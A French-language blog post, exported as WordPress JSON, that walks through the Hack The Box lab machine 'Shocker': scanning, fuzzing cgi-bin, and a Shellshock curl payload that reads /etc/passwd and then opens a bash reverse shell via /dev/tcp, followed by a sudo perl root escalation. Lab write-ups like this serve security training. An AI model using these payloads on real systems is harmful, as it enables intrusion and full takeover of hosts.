{"id":1898,"date":"2021-07-09T14:06:22","date_gmt":"2021-07-09T12:06:22","guid":{"rendered":"https:\/\/mikadmin.fr\/blog\/?p=1898"},"modified":"2021-09-19T01:50:39","modified_gmt":"2021-09-18T23:50:39","slug":"hackthebox-shocker","status":"publish","type":"post","link":"https:\/\/mikadmin.fr\/blog\/hackthebox-shocker\/","title":{"rendered":"HackTheBox : Shocker"},"content":{"rendered":"<span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\"><\/span> <span class=\"rt-time\"> 3<\/span> <span class=\"rt-label rt-postfix\">min read<\/span><\/span><p>Views: 877<\/p>\n<div style=\"height:39px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"596\" height=\"380\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/shocker-00-7dd5687e7a2665f74d567fd46057d77caf61e492f7c867322db812438a31da2c-1.png\" alt=\"shocker\" class=\"wp-image-1902\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/shocker-00-7dd5687e7a2665f74d567fd46057d77caf61e492f7c867322db812438a31da2c-1.png 596w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/shocker-00-7dd5687e7a2665f74d567fd46057d77caf61e492f7c867322db812438a31da2c-1-300x191.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/shocker-00-7dd5687e7a2665f74d567fd46057d77caf61e492f7c867322db812438a31da2c-1-150x96.png 150w\" sizes=\"auto, (max-width: 596px) 100vw, 596px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\"><strong>Shocker<\/strong> est une machine <strong>HTB<\/strong> (Hack The Box) retir\u00e9e et qui est bas\u00e9e sur la vuln\u00e9rabilit\u00e9 <strong><a href=\"https:\/\/blog.cloudflare.com\/inside-shellshock\/\" target=\"_blank\" rel=\"noreferrer noopener\">ShellSock<\/a><\/strong>, dans cette machine nous n&rsquo;utiliserons pas <strong>metasploit<\/strong>.<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<blockquote class=\"wp-block-quote has-text-align-center is-layout-flow wp-block-quote-is-layout-flow\"><p><em><strong>Shellshock<\/strong><\/em>, aussi appel\u00e9&nbsp;<em><strong>Bashdoor<\/strong><\/em>, est une&nbsp;<a href=\"https:\/\/fr.wikipedia.org\/wiki\/Bug_(informatique)\">vuln\u00e9rabilit\u00e9 logicielle<\/a>&nbsp;pr\u00e9sente dans le&nbsp;<a href=\"https:\/\/fr.wikipedia.org\/wiki\/Interface_syst%C3%A8me\">shell<\/a>&nbsp;<a href=\"https:\/\/fr.wikipedia.org\/wiki\/Unix\">Unix<\/a>&nbsp;<a href=\"https:\/\/fr.wikipedia.org\/wiki\/Bourne-Again_shell\">bash<\/a>. Elle a \u00e9t\u00e9 d\u00e9couverte en septembre&nbsp;<a href=\"https:\/\/fr.wikipedia.org\/wiki\/2014_en_informatique\">2014<\/a><sup><a href=\"https:\/\/fr.wikipedia.org\/wiki\/Shellshock_(faille_informatique)#cite_note-1\">1<\/a><\/sup>.<\/p><cite>wikip\u00e9dia<\/cite><\/blockquote>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<h2 class=\"has-text-align-center wp-block-heading\" style=\"font-size:40px\">Recon<\/h2>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">nmap -A -T5 10.10.10.56<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"912\" height=\"473\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-1.png\" alt=\"\" class=\"wp-image-1928\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-1.png 912w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-1-300x156.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-1-150x78.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-1-768x398.png 768w\" sizes=\"auto, (max-width: 912px) 100vw, 912px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<h2 class=\"has-text-align-center wp-block-heading\" style=\"font-size:40px\">Enumeration<\/h2>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous ne trouvons rien de concret sur le site web nous amenant \u00e0 chercher de ce c\u00f4t\u00e9 \u00e0 l&rsquo;aide de <strong><span style=\"color:#00d084\" class=\"tadv-color\">ffuf<\/span><\/strong> :<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">ffuf -u http:\/\/10.10.10.56\/FUZZ -c -w \/usr\/share\/seclists\/Discovery\/Web-Content\/common.txt -t 100<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"603\" height=\"66\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-2.png\" alt=\"\" class=\"wp-image-1938\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-2.png 603w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-2-300x33.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-2-150x16.png 150w\" sizes=\"auto, (max-width: 603px) 100vw, 603px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:35px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Ce qui nous permet de trouver un dossier <strong><span style=\"color:#fcb900\" class=\"tadv-color\">cgi-bin<\/span><\/strong> qui nous met la puce \u00e0 l&rsquo;oreille concernant la vuln\u00e9rabilit\u00e9 \u00e9voqu\u00e9e plus haut, cependant il nous faut donc <strong>fuzz<\/strong> ce dernier afin de trouver un fichier int\u00e9ressant comme par exemple un fichier avec l&rsquo;extension <strong><span style=\"color:#00d084\" class=\"tadv-color\">.sh<\/span><\/strong> :<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">ffuf -u http:\/\/10.10.10.56\/cgi-bin\/FUZZ -c -w \/usr\/share\/seclists\/Discovery\/Web-Content\/common.txt -e .sh -t 100<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"928\" height=\"523\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/Screenshot_3.png\" alt=\"\" class=\"wp-image-1941\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/Screenshot_3.png 928w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/Screenshot_3-300x169.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/Screenshot_3-150x85.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/Screenshot_3-768x433.png 768w\" sizes=\"auto, (max-width: 928px) 100vw, 928px\" \/><\/figure>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"has-text-align-center wp-block-heading\" style=\"font-size:40px\">Exploitation<\/h2>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">C&rsquo;est l&rsquo;heure de l&rsquo;exploitation, afin de v\u00e9rifier si la cible est vuln\u00e9rable \u00e0 la vuln\u00e9rabilit\u00e9 <strong>ShellSock<\/strong>, nous avons besoin de ce petit <strong>one-liner<\/strong> qui renverra le contenu du fichier <strong>\/etc\/passwd<\/strong> si c&rsquo;est positif.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">curl -H &quot;user-agent: () { :; }; echo; echo; \/bin\/bash -c &#039;cat \/etc\/passwd&#039;&quot; http:\/\/10.10.10.56\/cgi-bin\/user.sh<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"933\" height=\"619\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-4.png\" alt=\"\" class=\"wp-image-1942\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-4.png 933w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-4-300x199.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-4-150x100.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-4-768x510.png 768w\" sizes=\"auto, (max-width: 933px) 100vw, 933px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Dans notre cas la machine est bien vuln\u00e9rable et nous pouvons r\u00e9cup\u00e9rer un acc\u00e8s sur cette derni\u00e8re \u00e0 l&rsquo;aide du <strong>payload<\/strong> suivant :<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">curl -H &quot;user-agent: () { :; }; echo; echo; \/bin\/bash -c &#039;bash -i &gt;&amp; \/dev\/tcp\/IP\/PORT 0&gt;&amp;1&#039;&quot; http:\/\/10.10.10.56\/cgi-bin\/user.sh<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"209\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-5-1024x209.png\" alt=\"\" class=\"wp-image-1945\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-5-1024x209.png 1024w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-5-300x61.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-5-150x31.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-5-768x157.png 768w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-5.png 1200w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<h2 class=\"has-text-align-center wp-block-heading\" style=\"font-size:40px\">Privesc<\/h2>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Derni\u00e8re \u00e9tape nous devons passer de l&rsquo;<strong>utilisateur shelly<\/strong> \u00e0 l&rsquo;utilisateur <strong><a href=\"https:\/\/mikadmin.fr\/blog\/port-forwarding-with-chisel\/\">root<\/a><\/strong>, apr\u00e8s tr\u00e8s peu de recherche nous remarquons que cette derni\u00e8re \u00e0 le droit d&rsquo;ex\u00e9cuter le <strong>binaire perl<\/strong> en tant que <strong>root<\/strong> \u00e0 l&rsquo;aide de <strong>sudo<\/strong> :<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"761\" height=\"185\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-6.png\" alt=\"\" class=\"wp-image-1946\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-6.png 761w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-6-300x73.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-6-150x36.png 150w\" sizes=\"auto, (max-width: 761px) 100vw, 761px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Afin d&rsquo;exploiter cette faiblesse, il nous suffit simplement d&rsquo;utiliser le <strong>payload<\/strong> suivant :<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">sudo perl -e &#039;exec &quot;\/bin\/sh&quot;;&#039;<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"499\" height=\"125\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-7.png\" alt=\"\" class=\"wp-image-1948\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-7.png 499w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-7-300x75.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/07\/image-7-150x38.png 150w\" sizes=\"auto, (max-width: 499px) 100vw, 499px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n","protected":false},"excerpt":{"rendered":"<p><span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\"><\/span> <span class=\"rt-time\"> 3<\/span> <span class=\"rt-label rt-postfix\">min read<\/span><\/span>Shocker is a retired HTB (Hack The Box) machine that is based on the ShellSock vulnerability, in this machine we will not use metasploit. <a href=\"https:\/\/mikadmin.fr\/blog\/hackthebox-shocker\/\" class=\"more-link\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":1916,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"categories":[4],"tags":[21,66,9,45,67,63],"class_list":["post-1898","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-infosec","tag-ctf","tag-hackthebox","tag-linux","tag-pentest","tag-shellshock","tag-writeup"],"aioseo_notices":[],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/1898","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/comments?post=1898"}],"version-history":[{"count":0,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/posts\/1898\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media\/1916"}],"wp:attachment":[{"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/media?parent=1898"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/categories?post=1898"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mikadmin.fr\/blog\/wp-json\/wp\/v2\/tags?post=1898"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}